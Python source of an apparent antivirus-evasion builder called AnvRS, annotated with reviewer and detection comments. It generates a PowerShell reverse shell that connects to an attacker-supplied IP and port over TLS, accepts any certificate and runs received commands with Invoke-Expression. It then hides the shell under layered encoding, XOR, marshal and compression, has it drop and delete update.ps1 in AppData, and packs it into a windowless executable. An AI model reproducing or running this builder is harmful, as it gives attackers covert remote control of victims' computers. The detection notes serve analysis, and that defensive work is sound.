"""
<Coded by Hevin>
Đừng xóa đoạn này nếu bạn tôn trọng tác giả :3
Donate cho Hevin bằng cách vượt link: https://web1s.info/DonateForHevin
Cảm ơn các bạn rất nhiều ! Hãy nhớ sử dụng công cụ AnvRS với mục đích
học tập, nghiên cứu thôi nhé !
"""
import base64
import random
import re
import marshal
import zlib
import lzma
import argparse
import sys
import os
import shutil
import struct
import time
import subprocess
# Alphabet for generated identifiers: upper- and lower-case ASCII letters only.
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'


def get_func_name_random(min, max):
    """Return a random string of ASCII letters with length in [min, max].

    The length comes from ``random.randint(min, max)`` (both ends inclusive)
    and every character from ``random.choice`` over ``chars``.  The parameter
    names shadow the ``min``/``max`` builtins; they are kept so the signature
    stays unchanged.

    Analysis note: the names are regenerated on every run, so identifiers
    produced here are not stable across builds.  Signatures written against
    the tool's output should match structure, not variable names.
    """
    wanted = random.randint(min, max)
    alphabet = list(chars)
    picked = []
    for _ in range(wanted):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
def split_base64_equally(base64_string, num_parts):
    """Cut ``base64_string`` into consecutive slices of ``len // num_parts``.

    When the length is not a multiple of ``num_parts`` the remainder becomes
    one extra, shorter slice, so the result can hold more than ``num_parts``
    items.  ``num_parts == 0`` raises ``ZeroDivisionError``; a string shorter
    than ``num_parts`` gives a step of 0 and ``range`` raises ``ValueError``.
    """
    step = len(base64_string) // num_parts
    pieces = []
    for start in range(0, len(base64_string), step):
        pieces.append(base64_string[start:start + step])
    return pieces
def encstr(s, num_part):
    """Break ``s`` into fragments held in randomly named ``$``-variables.

    Returns a pair ``(declarations, expression)``: ``declarations`` is one
    ``$name = "fragment"`` line per fragment, and ``expression`` is the same
    names joined with ``+`` so that evaluating it rebuilds ``s``.

    Analysis note: the fragments stay in their original order and are joined
    by plain concatenation, so the literal can be recovered from the generated
    text by reading the assignments in sequence.
    """
    declarations = []
    names = []
    for chunk in split_base64_equally(s, num_part):
        ident = get_func_name_random(5, 10)
        declarations.append(f'${ident} = "{chunk}"\n')
        names.append("$" + ident)
    return ''.join(declarations), '+'.join(names)
def encstr_payload(s, num_part):
    """Break ``s`` into fragments held in randomly named bare variables.

    Same scheme as ``encstr`` but without the ``$`` prefix: the first item of
    the returned pair is one ``name = "fragment"`` line per fragment, and the
    second is the names joined with ``+``.
    """
    chunks = split_base64_equally(s, num_part)
    # One name per fragment, drawn in fragment order.
    idents = [get_func_name_random(5, 10) for _ in chunks]
    assignments = ''.join(
        f'{ident} = "{chunk}"\n' for ident, chunk in zip(idents, chunks)
    )
    return assignments, '+'.join(idents)
def enc_data_type(s, num_part):
    """Break ``s`` into ``$``-variables and return them placed side by side.

    The declarations match ``encstr`` (``$name = "fragment"`` lines); the
    second item of the returned pair is the variable names concatenated with
    no separator (``$a$b$c``) instead of being joined with ``+``.
    """
    lines = ''
    refs = ''
    for chunk in split_base64_equally(s, num_part):
        ident = get_func_name_random(5, 10)
        lines = lines + f'${ident} = "{chunk}"\n'
        refs = refs + "$" + ident
    return lines, refs
def safe_replace(main_str, search_str, replace_str):
    """Replace whole-word occurrences of ``search_str`` in ``main_str``.

    ``search_str`` is matched literally (it is passed through ``re.escape``)
    and only between ``\\b`` word boundaries, so a token embedded in a longer
    word is left alone.  ``replace_str`` is handed to ``re.sub`` unchanged, so
    it is treated as a replacement template: backslash sequences in it are
    interpreted by ``re``.
    """
    pattern = re.compile(r'\b' + re.escape(search_str) + r'\b')
    return pattern.sub(replace_str, main_str)
def payload2decimal(payload):
    """Return the code points of ``payload`` as a comma-separated string.

    Each character becomes the decimal value of ``ord(char)``; an empty input
    yields an empty string.  The mapping is one-to-one, so the text is
    recovered by splitting on commas and applying ``chr`` to each number.
    """
    return ','.join(map(str, map(ord, payload)))
def enc(contents):
# Wrap `contents` (Python source text) in one self-decoding layer and return
# the text of that layer. This is obfuscation, not encryption: the key is
# stored in the generated text next to the data it protects.
string = contents
a = 0
key = ""
# Build a 100-character key of decimal digits using `random` (not a CSPRNG).
while a < 100:
key = key + str(random.randint(0, 9))
a += 1
payload_length = len(string)
output_string = ""
# XOR every character with the key character at the same index, cycling the key.
for i in range(payload_length):
current_string = string[i]
current_key = key[i % len(key)]
output_string += chr(ord(current_string) ^ ord(current_key))
# repr() turns non-printable results into escape sequences; every single-quote
# character is then removed from that text.
# NOTE(review): that also drops any single quote that is part of the data --
# confirm whether this is intended.
c = repr(output_string)
encrypt = c.replace("'", "")
# Template of the generated layer: it holds the XOR output and the key as two
# string literals, repeats the XOR and runs the recovered text with
# eval(compile(..., 'exec')).
# Analysis note: because both literals are present, a layer can be undone
# offline by XOR-ing them; nothing has to be executed to read the next layer.
# The stable shape to look for is two long string literals, a chr(ord ^ ord)
# loop and an eval(compile(...)) call -- the variable names change per build.
code = rf"""
var1 = "{encrypt}"
var2 = "{key}"
var3 = len(var1)
var4 = ""
for var5 in range(var3):
var6 = var1[var5]
var7 = var2[var5 % len(var2)]
var4 += chr(ord(var6) ^ ord(var7))
eval(compile(var4, '', 'exec'))
"""
# Swap the var1..var7 placeholders for random 6-8 letter names. str.replace()
# operates on the whole template text, string literals included.
items = ['var1', 'var2', 'var3', 'var4', 'var5', 'var6', 'var7']
for item in items:
randomstr = get_func_name_random(6,8)
code = code.replace(item, randomstr)
return code
# PowerShell template for the script that ends up running on the target host.
# The tokens replace-dns, plussd, varnetsocket/netsocket, vario/iostream,
# varssl/sslstream, IP-ADDRESS and PORT are placeholders that are substituted
# further down in this file with safe_replace().
# What the template does, as written:
#   - retries a TCP connection once per second until one succeeds;
#   - wraps the stream in an SslStream whose certificate-validation callback
#     always returns $true (any server certificate is accepted) and passes
#     'cloudflare-dns.com' as the target host name of the handshake;
#   - passes whatever it reads from the stream to Invoke-Expression and writes
#     the result back, followed by the fixed prompt string 'AnvRS> '.
# DNSLookup is defined but never called anywhere in this template.
# NOTE(review): for detection, the outer encoding layers do not change what
# PowerShell finally executes -- script-block logging (event ID 4104) and AMSI
# see the decoded script. On the network side, a powershell.exe process with a
# long-lived outbound TLS session whose claimed host name does not match the
# destination address or the certificate presented is worth alerting on.
reverse_shell_powershell = r"""
replace-dns
varnetsocket
vario
varssl
function DNSLookup ($DNSRecord) {
return (([text.encoding]::UTF8).GetString((Invoke-WebRequest (plussd + $DNSRecord) -Headers @{'accept'='application/dns-json'}).Content) | ConvertFrom-Json).Answer.data.Trim('"')
}
do {
Start-Sleep -Seconds 1
try{
$TCPClient = New-Object netsocket('IP-ADDRESS', PORT)
} catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$SslStream = New-Object sslstream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]))
$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false)
if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {
$SslStream.Close()
exit
}
$StreamWriter = New-Object iostream($SslStream)
function WriteToStream ($String) {
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
$StreamWriter.Write($String + 'AnvRS> ')
$StreamWriter.Flush()
}
WriteToStream ''
try {
while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
$Output = try {
Invoke-Expression $Command 2>&1 | Out-String
} catch {
$_ | Out-String
}
WriteToStream ($Output)
}
} catch [System.IO.IOException] {
Write-Host ""
} finally {
$StreamWriter.Close()
$SslStream.Close()
}
"""
# Console banner printed when the tool starts; it has no effect on the output file.
banner = r"""
░█████╗░███╗░░██╗██╗░░░██╗██████╗░░██████╗
██╔══██╗████╗░██║██║░░░██║██╔══██╗██╔════╝
███████║██╔██╗██║╚██╗░██╔╝██████╔╝╚█████╗░
██╔══██║██║╚████║░╚████╔╝░██╔══██╗░╚═══██╗
██║░░██║██║░╚███║░░╚██╔╝░░██║░░██║██████╔╝
╚═╝░░╚═╝╚═╝░░╚══╝░░░╚═╝░░░╚═╝░░╚═╝╚═════╝░
<Reverse Shell Bypass AntiVirus>
╔══════════════════════════════════════════════════════╗
║ -> Developed by @Hevin and @Anonyviet ║
║ -> Discord: @hevin19 ║
║ -> Donate for me: https://web1s.info/DonateForHevin ║
╚══════════════════════════════════════════════════════╝
"""
# Command-line interface: --ip, --port, --icon and --output, all optional strings.
# NOTE(review): --ip and --port are neither marked required nor validated here;
# when they are omitted the values are None and the code below that uses them fails.
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", type=str,
help="Your IP Adress. Example: 127.0.0.1")
parser.add_argument("-p", "--port", type=str,
help="Your Port. Example: 1234")
parser.add_argument("--icon", type=str,
help="Enter the path to your ico file")
parser.add_argument("-o", "--output", type=str,
help="Output File. Default: 'AnonyvietHandsome.exe' ")
args = parser.parse_args()
# With no arguments at all: show the banner and the help text, then stop.
if len(sys.argv) == 1:
print(banner.center(20))
parser.print_help(sys.stderr)
sys.exit(0)
# Output name defaults to 'AnonyvietHandsome.exe'; that default is a fixed
# string in the tool and therefore a possible file-name indicator.
if args.output:
output_file = args.output
else:
output_file = 'AnonyvietHandsome.exe'
# add_icon starts as '' and becomes True/False depending on --icon; a missing
# icon file ends the run.
add_icon = ''
if args.icon:
icon_file = args.icon
if os.path.exists(icon_file):
add_icon = True
pass
else:
print(f'[!] "{icon_file}" file not found, please check and try again')
sys.exit(0)
else:
add_icon = False
ip_address = args.ip
port = args.port
# 'cls' is the Windows console clear command; the sleep calls in this script
# only pace the console output.
os.system('cls')
print(banner.center(20))
print('')
time.sleep(2)
# Turn the dotted IPv4 string into one hexadecimal integer literal, two hex
# digits per octet (constructed example: 127.0.0.1 -> 0x7f000001).
# Analysis note: the dotted form of the address therefore does not appear in
# the generated script; when hunting for a known address in decoded script
# text, search for its hex form as well.
ip_parts = list(map(int, ip_address.split('.')))
hex_representation = f"0x{''.join(format(part, '02x') for part in ip_parts)}"
print(f"[+] Converting {ip_address} to HEX")
time.sleep(1)
# Split a fixed URL and the .NET type names into fragments stored in randomly
# named PowerShell variables. The first value of each pair is the block of
# assignments, the second the expression that rebuilds the string.
# vargetstring/getstring are produced here but not used in the lines below.
vardns, dnslink = encstr('https://1.1.1.1/dns-query?name=anonyviet.com&type=', 25)
varnetsocket, netsocket = enc_data_type("Net.Sockets.TCPClient", 10)
vario, iostream = enc_data_type("IO.StreamWriter", 7)
vargetstring, getstring = enc_data_type("GetString", 4)
varssl, sslstream = enc_data_type("Net.Security.SslStream", 8)
# Fill the template placeholders. safe_replace() matches whole words only, so
# "netsocket" does not touch "varnetsocket", and so on.
payload = safe_replace(reverse_shell_powershell, "replace-dns", vardns)
payload = safe_replace(payload, "plussd", dnslink)
payload = safe_replace(payload, "varnetsocket", varnetsocket)
payload = safe_replace(payload, "netsocket", netsocket)
payload = safe_replace(payload, "vario", vario)
payload = safe_replace(payload, "iostream", iostream)
payload = safe_replace(payload, "varssl", varssl)
payload = safe_replace(payload, "sslstream", sslstream)
payload = safe_replace(payload, "IP-ADDRESS", hex_representation)
# NOTE(review): `port` is interpolated as given on the command line; it is
# never checked to be a number.
payload = safe_replace(payload, "PORT", port)
# Give the template's readable PowerShell variable names random replacements.
words = ["NetworkStream", "StreamWriter", "TCPClient", "SslStream", "DNSRecord", "BytesRead", "Command", "Output"]
for word in words:
random_str = get_func_name_random(4,8)
payload = safe_replace(payload, word, random_str)
# Encode the whole script as comma-separated decimal code points and wrap it in
# a one-liner that converts the numbers back to characters and runs the result.
# Analysis note: this wrapper text is constant apart from the number list
# (mixed-case IEx / -JoIN / [cHaR], then ExIt), and the script it rebuilds is
# what script-block logging and AMSI record once it is invoked.
decimal_representation = payload2decimal(payload)
print("[+] Obfuscating Payload...")
time.sleep(2)
stub = """IEx(-JoIN((decimal_representation)|%{[cHaR]$_}));ExIt"""
payload_decimal = stub.replace("decimal_representation", decimal_representation)
# Template of the Python stage that is later packed into the executable.
# "base64payload" and "plusbase" are placeholders filled in below. As written,
# the stage:
#   - changes into the directory named by an environment variable whose name is
#     rebuilt from base64 fragments (var1+var2+var3 is the base64 of "appdata";
#     var4 follows the padding -- presumably filler, confirm how b64decode
#     treats it);
#   - writes the decoded PowerShell text to 'update.ps1' in that directory;
#   - starts powershell, which reads the file into a variable, deletes the file
#     and passes the content to Invoke-Expression.
# NOTE(review): indicators that follow from these fixed strings are a
# short-lived update.ps1 created and removed in the user's AppData directory,
# and a powershell.exe child process whose command line contains Get-Content,
# Remove-Item and Invoke-Expression on .\update.ps1. Process-creation logging
# with command lines (event ID 4688, or Sysmon event ID 1) and file-creation
# telemetry capture both.
python_payload = r"""
import subprocess
import base64
import os
var1 = "YXB"
var2 = "wZG"
var3 = "F0YQ=="
var4 = "YQ=="
os.chdir(os.getenv(base64.b64decode(var1+var2+var3+var4).decode()))
base64payload
with open('update.ps1', 'w') as f:
f.write(base64.b64decode(plusbase).decode())
result = subprocess.run(r'powershell -c "$test = Get-Content .\update.ps1; Remove-Item -Path .\update.ps1; Invoke-Expression $test" ', shell=True, text=True, capture_output=True)
"""
# Base64-encode the PowerShell one-liner and split it across Python variables,
# then substitute both placeholders of the Python stage template.
encpayload = base64.b64encode(payload_decimal.encode()).decode()
base64payload, plusbase = encstr_payload(encpayload, 50)
s = python_payload.replace("base64payload", base64payload)
s = s.replace("plusbase", plusbase)
# Five nested enc() layers; each one carries its own key beside its data.
enc1 = enc(s)
enc2 = enc(enc1)
enc3 = enc(enc2)
enc4 = enc(enc3)
enc5 = enc(enc4)
# Compile the outermost layer to a code object and serialise it with marshal,
# then compress with lzma, then zlib, then base64-encode.
# Analysis note: every step is reversible without running the sample -- base64,
# zlib, lzma, then a marshalled code object that can be inspected with `dis`.
# The marshal format is specific to the Python version, so load it with a
# matching interpreter, in an isolated analysis environment.
comp = compile(enc5, '', 'exec')
mar = marshal.dumps(comp)
lz = lzma.compress(mar)
zl = zlib.compress(lz)
b64 = base64.b64encode(zl).decode()
# One-line loader written to disk; apart from the blob its text is constant.
stub2 = f"""import marshal, zlib, lzma, base64; exec(marshal.loads(lzma.decompress(zlib.decompress(base64.b64decode('{b64}')))))"""
# b[0] is the part of the output name before its first dot; it names the
# temporary .py file, the .spec file and the built .exe.
b = output_file.split('.')
with open(f'{b[0]}.py', 'w') as f:
f.write(stub2)
print("[+] Compiling Payload")
# Build a single-file executable with PyInstaller, optionally with an icon.
# NOTE(review): both command lines are assembled by string interpolation and
# run with shell=True, so a --icon or --output value containing spaces or
# shell metacharacters is interpreted by the shell on the machine running this
# script. Passing an argument list without shell=True avoids that.
# NOTE(review): output is discarded and the return code is not checked, so a
# failed build only shows up as an error in the file operations that follow.
if add_icon:
subprocess.run(rf"pyinstaller --onefile -i {icon_file} {b[0]}.py", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
subprocess.run(rf"pyinstaller --onefile {b[0]}.py", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Remove the build by-products and move the executable next to the script.
# os.rmdir() only succeeds when 'dist' is empty after the move.
os.remove(f'{b[0]}.spec')
shutil.move(f'dist/{b[0]}.exe', f'{b[0]}.exe')
shutil.rmtree('build')
os.rmdir('dist')
os.remove(f'{b[0]}.py')
# Patch one field of the built executable's PE header in place.
# NOTE(review): the file is opened without a `with` block; on the sys.exit(-1)
# path below it is never closed explicitly.
exe = open(output_file, "r+b")
# Offset 0x3c of the DOS header stores the offset of the PE header. The field
# is 4 bytes wide in the PE format; only its low 2 bytes are read here.
exe.seek(0x3c)
(PeHeaderOffset,) = struct.unpack("<H", exe.read(2))
exe.seek(PeHeaderOffset)
# 0x4550 is the "PE\0\0" signature read as a little-endian integer; stop if
# the file is not a PE image.
(PeSignature,) = struct.unpack("<I", exe.read(4))
if PeSignature != 0x4550:
sys.exit(-1)
# PE header + 0x5C is the Subsystem field of the optional header (4-byte
# signature + 20-byte COFF header + offset 68). The value 2 is
# IMAGE_SUBSYSTEM_WINDOWS_GUI, so no console window is created at start-up.
# Analysis note: only this field changes; the PyInstaller bootloader and its
# embedded archive are untouched, so identifying the packer still works.
exe.seek(PeHeaderOffset + 0x5C)
exe.write(struct.pack("<H", 0x02))
exe.close()
print("[+] Completed Successfully !")